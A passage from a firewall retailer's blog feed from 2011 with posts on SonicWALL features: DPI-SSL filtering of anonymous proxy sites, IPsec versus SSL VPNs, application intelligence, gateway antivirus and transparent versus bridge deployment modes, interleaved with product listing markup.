<iframe width="640" height="360" src="http://www.youtube-nocookie.com/embed/UoCCuyPhYDQ?rel=0&amp;hd=1" frameborder="0" allowfullscreen></iframe></div>
<h3>Content filtering of web content</h3>
<p> Content filtering of web content is normally used by organizations to prevent  users from viewing inappropriate/dangerous web sites or content.</p>
<h3> Anonymous proxy service web sites</h3>
<p> These services allow users to surf anonymously the web, hiding their original public  IP addresses and tunneling their traffic so that they can bypass any firewall  restrictions.</p>
<p> Normally users do not have to install any software on their  machines, just use their browsers and access the anonymous proxy service's web  site. On this site, they enter the URL of the destination they want to visit,  and they will access this destination through the proxy.</p>
<h3> Content filtering and anonymous proxy service web sites</h3>
<p> As long as the anonymous proxy service web sites are visited over plain HTTP,  access to them can be denied using the appropriate URL Filtering category on  the firewall(<strong>Hacking/Proxy Avoidance  Systems</strong> category on SonicWALL firewalls' Content Filtering service).</p>
<p> If the sites are accessed with HTTP over SSL, SSL will be  used to encrypt HTTP(HTTP headers, HTTP payloads) so the firewall will only see  the IP addresses of the destinations. Filtering on IP addresses is difficult  and error prone.</p>
<h3> <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-content-filtering">Content filtering</a> and <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-dpi-ssl">SonicWALL DPI-SSL</a></h3>
<p> With <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-dpi-ssl">SonicWALL DPI-SSL</a> you have the ability to apply over SSL encrypted traffic  any type of inspection your firewall might be capable of. The <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-content-filtering">Content Filtering  service</a> of your SonicWALL firewall can utilize DPI-SSL.</p>
<p> For inspecting the internal clients' SSL outgoing traffic,  the <strong><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-dpi-ssl">Client DPI-SSL</a></strong> feature is used:</p>
<ul  style="margin-left:30px; list-style-type:disc">
  <li>The SonicWALL firewall acts as a SSL proxy  between the internal clients and destination external servers; two SSL sessions  exist: one between the client and the SonicWALL and the other between the  SonicWALL and the server. </li>
  <li>The HTTP headers and HTTP payloads protected by  SSL are exposed so filtering policies can be applied to filter URLs or  inappropriate content.</li>
  <li>So the Content Filter service can deny access to  anonymous proxy service web sites using SSL.</li>
</ul>
<div class="category-products">
    <div class="toolbar">
    <div class="pager">
        <p class="amount">
                            <strong>3 Item(s)</strong>
                    </p>

        <div class="limiter">
            <label>Show</label>
            <select onchange="setLocation(this.value)">
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=10">
                    10                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=20" selected="selected">
                    20                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=50">
                    50                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=75">
                    75                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=100">
                    100                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=200">
                    200                </option>
                        </select> per page        </div>

        
    </div>

        <div class="sorter">
                <p class="view-mode">
                                </p>
            
        <div class="sort-by">
            <label>Sort By</label>
            <select onchange="setLocation(this.value)">
                            <option value="http://www.firewalls.com/blog/rss/index/?dir=asc&amp;order=position" selected="selected">
                    Position                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?dir=asc&amp;order=name">
                    Name                </option>
                        </select>
                            <a href="http://www.firewalls.com/blog/rss/index/?dir=desc&amp;order=position" title="Set Descending Direction"><img src="http://static.firewalls.com/skin/frontend/default/default/images/i_asc_arrow.gif" alt="Set Descending Direction" class="v-middle" /></a>
                    </div>
    </div>
    </div>
                <ol class="products-list" id="products-list">
                    <li class="item">
                        <div class="product-image-dtt">
            	<a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-dpi-ssl/sonicwall-dpi-ssl-for-nsa-240-2400-series.html" title="SonicWALL DPI-SSL for NSA 240/2400 Series" class="product-image">
                	                    	<img src="http://static.firewalls.com/media/media/custom-images/small/sonicwall-dpi-ssl.jpg" width="135" height="135" alt="SonicWALL DPI-SSL for NSA 240/2400 Series" />
					                </a>
                <br />
                       
			</div>
            
            <div class="product-links">
                <div class="add-to-holder" id='add-to-cart-holder-9095'>
					<img src="http://static.firewalls.com/skin/frontend/default/default/images/ajax-loader4.gif"  />
                	<br />
					<strong>Finding Best Price...</strong>
				</div>
			</div>
                    
                    
                        <div class="product-shop">
                <div class="f-fix">
                                        <h2 class="product-name"><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-dpi-ssl/sonicwall-dpi-ssl-for-nsa-240-2400-series.html" title="SonicWALL DPI-SSL for NSA 240/2400 Series">SonicWALL DPI-SSL for NSA 240/2400 Series </a></h2>
					                    <div class="desc std">
                        Deep Packet Inspection of Secure Socket Layer (DPI-SSL) extends SonicWALL NSA 240/2400 Series Deep Packet Inspection technology to allow for the inspection of encrypted HTTPS traffic and other SSL-based traffic.                     </div>
					                    <ul class="add-to-links">
                                                <li><a target="_blank" href="http://www.firewalls.com/quote/" rel="floatbox.ajax" rev="width:440 height:600">Request a Quote</a></li>



			

                    </ul>
                </div>
            </div>
        </li>
                    <li class="item">
                        <div class="product-image-dtt">
            	<a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-dpi-ssl/sonicwall-dpi-ssl-for-nsa-3500-4500-5000.html" title="SonicWALL DPI-SSL for NSA 3500/4500/5000" class="product-image">
                	                    	<img src="http://static.firewalls.com/media/media/custom-images/small/sonicwall-dpi-ssl.jpg" width="135" height="135" alt="SonicWALL DPI-SSL for NSA 3500/4500/5000" />
					                </a>
                <br />
                       
			</div>
            
            <div class="product-links">
                <div class="add-to-holder" id='add-to-cart-holder-9329'>
					<img src="http://static.firewalls.com/skin/frontend/default/default/images/ajax-loader4.gif"  />
                	<br />
					<strong>Finding Best Price...</strong>
				</div>
			</div>
                    
                    
                        <div class="product-shop">
                <div class="f-fix">
                                        <h2 class="product-name"><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-dpi-ssl/sonicwall-dpi-ssl-for-nsa-3500-4500-5000.html" title="SonicWALL DPI-SSL for NSA 3500/4500/5000">SonicWALL DPI-SSL for NSA 3500/4500/5000 </a></h2>
					                    <div class="desc std">
                        Deep Packet Inspection of Secure Socket Layer (DPI-SSL) extends SonicWALL NSA 3500/4500/5000 Series Deep Packet Inspection technology to allow for the inspection of encrypted HTTPS traffic and other SSL-based traffic.                     </div>
					                    <ul class="add-to-links">
                                                <li><a target="_blank" href="http://www.firewalls.com/quote/" rel="floatbox.ajax" rev="width:440 height:600">Request a Quote</a></li>



			

                    </ul>
                </div>
            </div>
        </li>
                    <li class="item last">
                        <div class="product-image-dtt">
            	<a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-dpi-ssl/sonicwall-deep-packet-inspection-for-ssl-dpi-ssl-upgrade-license.html" title="SonicWALL Deep Packet Inspection for SSL  (DPI-SSL) Upgrade License - E-Class" class="product-image">
                	                    	<img src="http://static.firewalls.com/media/media/custom-images/small/sonicwall-dpi-ssl.jpg" width="135" height="135" alt="SonicWALL Deep Packet Inspection for SSL  (DPI-SSL) Upgrade License - E-Class" />
					                </a>
                <br />
                       
			</div>
            
            <div class="product-links">
                <div class="add-to-holder" id='add-to-cart-holder-7650'>
					<img src="http://static.firewalls.com/skin/frontend/default/default/images/ajax-loader4.gif"  />
                	<br />
					<strong>Finding Best Price...</strong>
				</div>
			</div>
                    
                    
                        <div class="product-shop">
                <div class="f-fix">
                                        <h2 class="product-name"><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-dpi-ssl/sonicwall-deep-packet-inspection-for-ssl-dpi-ssl-upgrade-license.html" title="SonicWALL Deep Packet Inspection for SSL  (DPI-SSL) Upgrade License - E-Class">SonicWALL Deep Packet Inspection for SSL  (DPI-SSL) Upgrade License - E-Class </a></h2>
					                    <div class="desc std">
                        Deep Packet Inspection of Secure Socket Layer (DPI-SSL) extends SonicWALL’s Deep Packet Inspection technology to allow for the inspection of encrypted HTTPS traffic and other SSL-based traffic.                     </div>
					                    <ul class="add-to-links">
                                                <li><a target="_blank" href="http://www.firewalls.com/quote/" rel="floatbox.ajax" rev="width:440 height:600">Request a Quote</a></li>



			

                    </ul>
                </div>
            </div>
        </li>
        </ol>
    <script type="text/javascript">decorateList('products-list', 'none-recursive')</script>
			<script language="javascript">
		Event.observe(window, 'load', function() {
			var url = 'http://www.firewalls.com/ajax/index/addtocartbox/';
			var parameters = { productIds: "9095,9329,7650" };
			new Ajax.Request(url, {
				method: 'post',
				parameters: parameters,
				onSuccess: function(transport)  {
					var result = transport.responseText.evalJSON();
					if(result.length>0){
						for(i=0;i<result.length;i++){
							var placeHolder = $('add-to-cart-holder-'+result[i].productId);
							if(placeHolder){
								placeHolder.update(result[i].html);
								fb.activateElements();
							}
						}
					}
				}
			});			
		});	
		</script>
		
    	    <div class="toolbar-bottom">
        <div class="toolbar">
    <div class="pager">
        <p class="amount">
                            <strong>3 Item(s)</strong>
                    </p>

        <div class="limiter">
            <label>Show</label>
            <select onchange="setLocation(this.value)">
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=10">
                    10                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=20" selected="selected">
                    20                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=50">
                    50                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=75">
                    75                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=100">
                    100                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?limit=200">
                    200                </option>
                        </select> per page        </div>

        
    </div>

        <div class="sorter">
                <p class="view-mode">
                                </p>
            
        <div class="sort-by">
            <label>Sort By</label>
            <select onchange="setLocation(this.value)">
                            <option value="http://www.firewalls.com/blog/rss/index/?dir=asc&amp;order=position" selected="selected">
                    Position                </option>
                            <option value="http://www.firewalls.com/blog/rss/index/?dir=asc&amp;order=name">
                    Name                </option>
                        </select>
                            <a href="http://www.firewalls.com/blog/rss/index/?dir=desc&amp;order=position" title="Set Descending Direction"><img src="http://static.firewalls.com/skin/frontend/default/default/images/i_asc_arrow.gif" alt="Set Descending Direction" class="v-middle" /></a>
                    </div>
    </div>
    </div>
    </div>
    <div class="clear"></div>
</div>
]]></description>
      <pubDate>Mon, 28 Nov 2011 17:40:21 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[IPSec VPN or SSL VPN, Which do I Choose?]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/ipsec_vs_ssl_select/</link>
      <description><![CDATA[<p>SonicWALL offers two types of remote access VPNs:</p>
<ul style="list-style-type:disc; margin-left:30px">
  <li>IPsec-based.</li>
  <li>SSL-based; both clientless mode and VPN client.</li>
</ul>
<table class="data-table" id="product-attribute-specs-table">
  <thead><tr>
    <th >&nbsp;</th>
    <th >SonicWALL Firewalls</th>
    <th >SonicWALL SRA</th>
  </tr></thead>
  <tr class="odd">
    <td ><strong>IPsec-based</strong></td>
    <td >Yes, Global VPN Client</td>
    <td >No</td>
  </tr>
  <tr>
    <td ><strong>SSL-based Clientless mode</strong></td>
    <td >Limited</td>
    <td >Full</td>
  </tr>
  <tr class="odd">
    <td ><strong>SSL-based VPN client</strong></td>
    <td >Yes, NetExtender</td>
    <td >Yes, NetExtender</td>
  </tr>
</table>
<h3>IPsec-based remote access VPN</h3>
<p> In IPsec-based VPNs, IPsec is used to protect and tunnel users’ data. IPsec-based  remote access VPNs represent the traditional or old way of providing remote  access to resources; such access requires a client to be installed on users’  machines.</p>
<p> SonicWALL provides an enhanced IPsec-based remote access VPN experience through  SonicWALL Global VPN Clients. The VPN connection is robust, offers good  performance and network level access.</p>
<h3> SSL-based remote access VPN</h3>
<p> In SSL-based VPNs, SSL is used to protect users’ data. SSL-based remote access  VPNs represent the newer or modern way of providing anywhere remote access to  resources; such access does not necessarily require a client to be installed on  users’ machines.</p>
<p> The clientless mode uses the browser as the base VPN client to provide access  to client-server applications. The SonicWALL NetExtender, a SSL VPN client, offers  network level access to resources.</p>
<h3>IPsec-based remote access VPNs pros and cons</h3>
<table class="data-table" id="product-attribute-specs-table">
 <thead> <tr>
    <th >Pros</th>
    <th >Cons</th>
  </tr></thead>
  <tr>
    <td valign="top" ><ul style="list-style-type:disc; margin-left:30px">
      <li>Robust connection</li>
      <li>Good performance</li>
      <li>Does not require a dedicated VPN appliance</li>
    </ul></td>
    <td ><ul style="list-style-type:disc; margin-left:30px">
      <li>Limited VPN client OS support</li>
      <li>Connectivity issues</li>
      <li>Requires a client even for the most basic type    of access</li>
      <li>Rather suited for managed endpoints needing    network level access</li>
    </ul></td>
  </tr>
</table>

<h3>SSL-based remote access VPNs pros and cons</h3>
<table class="data-table" id="product-attribute-specs-table">
  <thead><tr>
    <th >Pros</th>
    <th>Cons</th>
  </tr></thead>
  <tr>
    <td ><ul style="list-style-type:disc; margin-left:30px">
      <li>Easy to deploy and manage</li>
      <li>Both clientless and client-based modes</li>
      <li>Anywhere Connectivity</li>
      <li>Broad OS support</li>
      <li>Mobile Clients support</li>
      <li>Both managed and unmanaged endpoints support</li>
      <li>Granular access to resources</li>
      <li>Better ROI* compared to IPsec</li>
    </ul></td>
    <td valign="top"><ul style="list-style-type:disc; margin-left:30px">
      <li>For the moment, the fully featured clientless    mode requires a dedicated SSL VPN gateway appliance</li>
      <li>Needs Java or ActiveX downloads to extend    functionality in clientless mode</li>
    </ul></td>
  </tr>
</table>
<p><sup>*ROI quantifies both costs and benefits</sup>
  
</p>
<h3>Where to use SSL-based remote access VPNs</h3>
<p> SSL is a better choice for remote access VPNs than IPsec in the current dynamic  landscape which includes a mixture of devices(laptops, smartphones, tablets,  etc.) and both managed and unmanaged endpoints.</p>
<p> New remote access VPN deployments should be using SSL-based  VPNs. Furthermore, you should consider migrating existing IPsec-based remote  access VPNs to SSL ones.</p>
<h3> Where to use IPsec-based remote access VPNs</h3>
<p> Due to connectivity issues and the requirement of a VPN client, IPsec-based  remote access VPNs tend to have a limited usability scope these days; rather suited  for a small group of managed endpoints.</p>
<p> For example, can work for advanced users who need network  level access(e.g.remote admins) and who connect from locations relatively  known(e.g. IPsec is not blocked).</p>
<p> You should consider limiting the use of IPsec-based VPNs  mostly for s2s(site-to-site) VPN connections.</p>
]]></description>
      <pubDate>Mon, 21 Nov 2011 17:00:01 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Why Firewall Port Blocking No Longer Works]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/firewall-port-blocking/</link>
      <description><![CDATA[<p>Since the mid 1990's Network Address Translation (NAT) was designed to alieviate IP address exhustion. &nbsp;Along with this technology came the ability for network administrators to control what outbound ports users could access. &nbsp;Example, for simple web browsing you would open up the HTTP service on port 80. &nbsp;Additionally, the admin could control access to applications on the Internet such as instant messengers and games.</p>
<p>Since then, application developers have worked around these firewall blocks by simply allowing their applications to run over the ports that are open on the firewall (e.g. HTTP). &nbsp;This new approach to "bypassing the firewall" has generated a new technology called application intelligence. &nbsp;With this new technology firewalls are now able to examine the traffic running through these open ports and identify the actual application using it. &nbsp;In turn, this provides the firewall administrator with the ability to allow or deny access to these applications.</p>
<p>In the follow video we walk you through a demonstration of how this technology works at identifying the applications.</p>

<iframe width="720" height="366" src="http://www.youtube.com/embed/8fpNOQVD_Ik?rel=0" frameborder="0" allowfullscreen></iframe>]]></description>
      <pubDate>Tue, 15 Nov 2011 22:13:28 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[SonicWALL NGFW GAV]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/sonicwall_ngfw_gav/</link>
      <description><![CDATA[<h3>The need for gateway antivirus</h3>
<p> A typical corporate firewall sits at the edge acting as a transit point between  untrusted zones(like the Internet) and trusted ones(like your internal  network); furthermore  it can provide  network separation between some internal zones(e.g. LAN servers and LAN users).
<p align="center"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/diag.png" alt="" /></p>
  The traffic passing through the corporate firewall may  contain malware, viruses or worms. <br>
<p align="center"> <img src="http://static.firewalls.com/media/wysiwyg/firewalls/malw_path.png" alt="" /></p>
  As such, the firewall represents an important point of  detection, filtering and logging this malicious traffic. That's why enterprises  implement antivirus and antimalware scanning policies at the gateway level.</p>
<h3> <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-gateway-anti-virus">Gateway antivirus issues</a></h3>
<p> Traditionally vendors offered UTM(Unified Threat Management) gateways with  antivirus/antimalware scanning capabilities. Organizations can be somehow unhappy  with these due to various issues.</p>
<ul style="list-style-type:circle; margin-left:30px">
  <li><strong>Performance  degradation</strong>; as the security services are turned on(antivirus, IPS, etc.) on  the UTM performance drastically drops and users start to experience latency  accessing the needed resources.</li>
  <li><strong>Large  files scanning issues</strong>; to avoid performance issues, many vendors only scan  small files.</li>
  <li><strong>Limited  protocols coverage</strong>; only a few popular protocols(like HTTP, FTP) are  scanned for malicious traffic.</li>
  <li><strong>Limited  visibility</strong>; encrypted traffic(typically SSL traffic, e.g. HTTPS) cannot be  inspected, malicious traffic slipping through.</li>
  <li><strong>Small  threats signature database</strong>; given the increasing number of viruses, worms,  etc., with a traditional database of signatures is hard to get a decent level  of protection.</li>
  <li><strong>Limited inter-zone  scanning flexibility</strong>; as depicted above the firewall separates many zones  and all traffic needs to be inspected not just the one between the Internet and  the internal network.</li>
</ul>
<h3><a href="http://www.firewalls.com/sonicwall/sonicwall-firewall">SonicWALL Next Generation Firewall(NGFW) </a>and its <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-gateway-anti-virus">gateway  antivirus inspection</a>(<a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-gateway-anti-virus">GAV</a>)</h3>
<p> <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall">SonicWALL NGFW</a> is designed to deal with the above mentioned issues by  incorporating certain key features.</p>
<ul style="list-style-type:circle; margin-left:30px">
  <li><strong>High-performance  scanning engine to deliver real-time gateway anti-virus scanning</strong>; the SonicWALL  Reassembly-Free Deep Packet Inspection engine  scans unlimited file sizes, and hundreds of  thousands of concurrent downloads in real time.</li>
  <li><strong>Broad  protocol coverage</strong>; supports popular protocols such as HTTP(meaningless of  port), FTP, SMTP, POP3, IMAP, NetBIOS or IM and P2P plus the scanning of  generic TCP streams for viruses.</li>
  <li><strong>Encrypted  traffic scanning</strong>; the GAV utilizes SonicWALL's Deep Packet Inspection of  Secure Socket Layer (DPI-SSL) to inspect encrypted HTTPS traffic and other  SSL-based traffic.</li>
  <li><strong>Cloud  Anti-Virus Database</strong>; the cloud Anti-Virus database contains millions of  signatures dynamically updated.</li>
  <li><strong>Great  inter-zone scanning flexibility</strong>; traffic between many security zones can be  scanned.</li>
  <li><strong>Compression  support</strong>; SonicWALL NGFW is capable of decompressing HTTP traffic compressed  with gzip or deflate methods. Also SMTP, POP3 and IMAP protocol scanning options  include base64 decoding, zip(including archives) and gzip decompression  capabilities.</li>
  <li><strong>Additional  features</strong>; password protected ZIP archive files, various packed executable  files, and Microsoft Office documents containing Macros can be prohibited.</li>
</ul>
<h3>Summary</h3>
<p> <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-gateway-anti-virus">Gateway antivirus inspection</a> can add an additional layer of protection against  today's threats like malware or viruses. SonicWALL NGFW is able to perform  gateway antivirus inspection over many protocols(including encrypted ones) with  no file size limitations and without introducing performance issues.</p>
]]></description>
      <pubDate>Sat, 05 Nov 2011 14:37:31 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[When to use Transparent Mode or Bridge Mode]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/transparent_mode_or_bridge_mode/</link>
      <description><![CDATA[<h3> The need to simplify or aid firewall deployment</h3>
<p> Deploying a new firewall into a network can be a complicated process  due to various issues(e.g. IP address reconfiguration, network topology changes,  current firewall, etc.). In an attempt to help enterprises deal with these,  firewall vendors came up with &ldquo;drop-in&rdquo; solutions.
  <p align="center"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/drop.png" alt="" /></p>
  As such, often firewalls can be deployed in transparent or  bridge modes(bump in the wire) instead of the traditional mode of operation(as  a routed hop). Among various vendors these two modes(transparent and bridge) may  have the same meaning, referring to firewalls operating at Layer 2, like a  bridge.</p>
<p> When it comes to SonicWALL firewalls and SonicOS Enhanced,  the <strong>Transparent Mode</strong> and <strong>L2 (Layer 2) Bridge Mode</strong> have different  meanings.</p>
<h3> SonicWALL Firewalls in Transparent Mode</h3>
<p> A mode that allows a SonicWALL firewall(running either SonicOS Standard or Enhanced)  to be inserted into an existing network without the need for IP reconfiguration  by spanning a single IP subnet across two or more interfaces.</p>
<ul style="list-style:circle; margin-left:30px" >
  <li>No re-addressing of any portion of the network  including the gateway router; hosts on the Transparent Interface must be  specifically declared.</li>
  <li>Two or more interfaces can be used.</li>
  <li>Operates at Layer 3.</li>
  <li>Handles only IPv4 traffic; transparent Mode will  drop (and possibly log) all non-IPv4 traffic.</li>
  <li>Broadcast traffic is dropped and logged(  exception would be NetBIOS which can be handled by the IP Helper).</li>
  <li>Multicast traffic, with IGMP dependency, can be  inspected and passed.</li>
  <li>By default, traffic will not be NAT-ed from/to  the WAN to/from Transparent Mode interface, but it can be NAT-ed to other  paths, if needed.</li>
  <li>Stateful Packet Inspection and all security  services (GAV, IPS, Anti-Spy, CFS) are supported.</li>
  <li>DHCP services can be provided by interfaces  operating in Transparent Mode, or these can pass DHCP using the IP Helper.</li>
  <li>VPN operations are supported with no special  configuration requirements.</li>
  <li>The firewall acts as a Proxy ARP, proxying ARP  requests on behalf of specified internal hosts(servers, workstations, etc.) and  router gateway respectively; that is, as per bellow image, the internal hosts  see the gateway router MAC address as SonicWALL&rsquo;s internal interface MAC  address, while in reverse, the gateway router sees the internal hosts MAC  addresses as SonicWALL&rsquo;s external interface MAC address.</li>
</ul>
<p align="center"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/bridge_diag.png" alt="" /></p>
<h3>SonicWALL Firewalls in L2 Bridge Mode</h3>
<p> A mode that allows a SonicWALL firewall(running SonicOS Enhanced) to be  inserted into an existing network without the need for IP reconfiguration  similar with the Transparent Mode but providing more transparency(the firewall  acts as a Layer 2 bridge) and versatile functionality.</p>
<div class="add-to-holder"> <strong>Bridge-Pair</strong> - a logical interface set composed of a Primary Bridge Interface and a  Secondary Bridge Interface; a Bridge-Pair behaves like a two-port learning  bridge with full L2 transparency.<br>
  <strong>Bridge-Partner</strong> - the term used to refer to the &ldquo;other&rdquo; member of a Bridge-Pair.</div>
<ul style="list-style:circle; margin-left:30px" >
  <li>No re-addressing of any portion of the network  including the gateway router; hosts on either side of a bridge are dynamically  learned.</li>
  <li>Maximum two interfaces can be used for the same  subnet.</li>
  <li>Operates at Layer 2.</li>
  <li>Handles all traffic; including IPv4 or IPv6  traffic, STP(Spanning Tree Protocol) and unrecognized IP types.</li>
  <li>Broadcast traffic is passed from the receiving  Bridge-Pair interface to the Bridge-Partner interface.</li>
  <li>Multicast traffic can be inspected and passed  across L2 Bridge-Pairs.</li>
  <li>By default, traffic will not be NAT-ed from one  Bridge-Pair interface to the Bridge-Partner, but it can be NAT-ed to other  paths, if needed.</li>
  <li>Stateful Packet Inspection and all security  services (GAV, IPS, Anti-Spy, CFS) are supported.</li>
  <li>VPN operations are supported with no special  configuration requirements.</li>
  <li>DHCP services cannot be provided in this mode, but  DHCP can be passed through a Bridge-Pair.</li>
  <li>The firewall passes ARP requests through  natively; that is, hosts communicating across the L2 Bridge will see the actual  MAC addresses of their peers.</li>
</ul>

<p align="center"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/transp_diag.png" alt="" /></p>

<p>When to use Transparent Mode and when to use L2 Bridge  Mode</p>
<table  id="product-attribute-specs-table" class="data-table">
 <thead> <tr>
    <th ><strong>Requirement</strong></th>
    <th ><p><strong>Mode</strong></p></th>
  </tr></thead><tbody>
  <tr>
    <td ><p>Need to pass non-IPv4 traffic</p></td>
    <td ><p>L2 Bridge Mode as Transparent Mode passes only IPv4 traffic.</p></td>
  </tr>
  <tr>
    <td ><p>Need to pass broadcast traffic</p></td>
    <td ><p>L2 Bridge Mode as Transparent Mode drops broadcast traffic(exception    being NetBios).</p></td>
  </tr>
  <tr>
    <td ><p>Multiple Subnets support</p></td>
    <td ><p>L2 Bridge Mode as Transparent Mode only supports a single subnet(that    which is assigned to, and spanned from the Primary WAN).</p></td>
  </tr>
  <tr>
    <td ><p>VLAN traffic</p></td>
    <td ><p>L2 Bridge Mode as VLAN traffic is passed through the L2 Bridge and    inspected as opposed to Transparent Mode where VLANs will be terminated by    the SonicWALL rather than passed.</p></td>
  </tr>
  <tr>
    <td ><p>No disruption to most network communications</p></td>
    <td ><p>L2 Bridge Mode as Transparent Mode may introduce a certain level of    disruptiveness; particularly with regard to ARP, VLAN support, multiple subnets    and non-IPv4 traffic types.</p></td>
  </tr>
  <tr>
    <td ><p>PortShield interfaces support</p></td>
    <td ><p>Transparent Mode as PortShield interfaces cannot be assigned to    either interface of an L2 Bridge Pair.</p></td>
  </tr>
  <tr>
    <td ><p>If more than two interfaces are required to operate on the same    subnet</p></td>
    <td ><p>Transparent Mode as two interfaces are the maximum allowed in an L2    Bridge Pair.</p></td>
  </tr>
  <tr>
    <td ><p>DHCP services support</p></td>
    <td ><p>Transparent Mode as L2 Bridge Pair can only pass DHCP.</p></td>
  </tr>
  <tr>
    <td ><p>Running SonicOS Standard</p></td>
    <td ><p>Transparent Mode as L2 Bridge Mode requires SonicOS Enhanced.</p></td>
  </tr>
  <tr>
    <td ><p>Simultaneously Bridge and route/NAT</p></td>
    <td ><p>Mixed L2 Bridge Mode.</p></td>
  </tr></tbody>
</table>
<br>
<br>

<div class="add-to-holder"><strong>Mixed-Mode  Operation</strong> - the L2 Bridge Mode can concurrently provide L2 Bridging and  conventional services, such as routing, NAT, VPN, and wireless operations. This  means the Bridge-Pair will not be the only point of ingress/egress through the  SonicWALL. The firewall can be used as an L2 Bridge for one segment of the  network, while providing a complete set of security services to the remainder  of the network.</p>
<p> <strong>Captive-Bridge  Mode</strong> - an optional mode of L2 Bridge which prevents traffic that has  entered an L2 bridge from being forwarded to a non-Bridge-Pair interface, ensuring  that traffic which enters an L2 Bridge exits the L2 Bridge rather than taking  its most logically optimal path.</div>
<h3> Summary</h3>
<p> The two modes of operation of SonicOS Enhanced, Transparent and L2 Bridge,  allow drop-in deployment solutions of SonicWALL firewalls.</p>
<p> They enable enterprises with no immediate plans of current firewall replacement  to benefit from UTM security along with a smooth migration path to full  security services operation.</p>
]]></description>
      <pubDate>Tue, 01 Nov 2011 13:30:43 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Free Online Training & Admin Tools for SonicWALL]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/online_training_tool/</link>
      <description><![CDATA[<table>
  <tr>
    <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/stay_secure_promo.jpg" alt="" /></td>
    <td>Firewalls.com stands by their motto "Get Secure. Stay Secure."    We do   this by providing both superior technical advice before you make   a   purchase and by providing on-going tools to help you keep your   network   secure. To help you Stay Secure, we are offering free online training   and Admin Tools for SonicWALL firewalls.</td>
  </tr>
</table>

<p>&nbsp;</p>
<p>Admin Tools for SonicWALL is a exclusive collection of   training, troubleshooting and performance enhancing tools for SonicWALL   firewalls.  These tools are provided for free to Firewalls.com customer   who purchase any SonicWALL firewall for their network or customers.</p>
          <ul>
            <li>Training Videos to help you configure and secure your firewall.</li>
            <li> Audit your firewall for security and performance enhancements.</li>
            <li> Document your firewall for auditors, customers and backup.</li>
            <li> Performance testing tools to maximize throughput speed.</li>
            <li> Plus many more tools being added ...</li>
          </ul>
<iframe width="720" height="396" src="http://www.youtube.com/embed/NKy2XRnZAU0?rel=0&amp;hd=1" frameborder="0" allowfullscreen></iframe><br>
<div class="add-to-holder">
<h2><a href="http://www.firewalls.com/sonicwall-tools/sonicwall-admin-tools">» Learn More about How to gain access to our training and admin tools for SonicWALL. </a></h2>
</div>]]></description>
      <pubDate>Sat, 29 Oct 2011 04:29:53 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[How to Create a Custom Firewall Service]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/sonicwall-custom-service/</link>
      <description><![CDATA[<p>Even though the SonicWALL firewall comes with many of the most common service ports defined there are cases where you need to create your own.  Example, you may have a web application running on a unique port like 8080 that is not defined in the SonicWALL.  This video will walk you through the process of how to create the unique service and how to add the firewall rule.</p><BR>

<iframe width="720" height="366" src="http://www.youtube.com/embed/KEX7V1ExvNw" frameborder="0" allowfullscreen></iframe>]]></description>
      <pubDate>Fri, 28 Oct 2011 12:45:54 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[NSA 220 and NSA 250M Series are Now Available]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/nsa_220_nsa_250m_now_available/</link>
      <description><![CDATA[<a target="_blank" href="http://www.firewalls.com/">SonicWALL, Inc</a>., today introduced two high-performance, application-aware next-generation firewalls for branch offices and small- medium-sized businesses (SMBs). The <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series/sonicwall-nsa-220">NSA 220 Series </a>and NSA 250M Series deliver an unmatched combination of security, performance and price in this class of next-generation firewalls.
